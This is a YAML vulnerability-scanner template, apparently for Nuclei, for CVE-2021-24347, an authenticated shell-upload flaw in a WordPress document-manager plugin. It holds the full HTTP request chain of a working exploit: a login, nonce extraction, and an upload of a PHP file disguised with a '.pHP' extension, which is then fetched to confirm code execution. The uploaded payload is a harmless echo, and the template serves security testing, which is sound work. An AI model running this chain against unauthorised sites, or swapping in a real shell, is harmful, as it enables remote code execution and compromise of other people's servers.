id: CVE-2021-24347

info:
  name: SP Project & Document Manager < 4.22 - Authenticated Shell Upload
  author: theamanrawat
  severity: high
  description: |
    The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files, however, the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded by checking the file extension. It was discovered that php files could still be uploaded by changing the file extension's case, for example, from "php" to "pHP".
  reference:
    - https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a
    - https://wordpress.org/plugins/sp-client-document-manager/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24347
  remediation: Fixed in version 4.22
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-24347
    cwe-id: CWE-178
  metadata:
    verified: "true"
  tags: wp-plugin,wp,sp-client-document-manager,authenticated,wordpress,cve2021,rce,wpscan,cve

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy

        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="cdm_upload_file_field"

        {{nonce}}
        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="_wp_http_referer"

        /wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1
        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="dlg-upload-name"


        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="dlg-upload-file[]"; filename=""
        Content-Type: application/octet-stream


        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP"
        Content-Type: image/svg+xml

        <?php

        echo "CVE-2021-24347";

        ?>
        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="dlg-upload-notes"


        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="sp-cdm-community-upload"

        Upload
        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--


      - |
        GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(all_headers_4, "text/html")
          - status_code_4 == 200
          - contains(body_4, "CVE-2021-24347")
        condition: and

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'name="cdm_upload_file_field" value="([0-9a-zA-Z]+)"'
        internal: true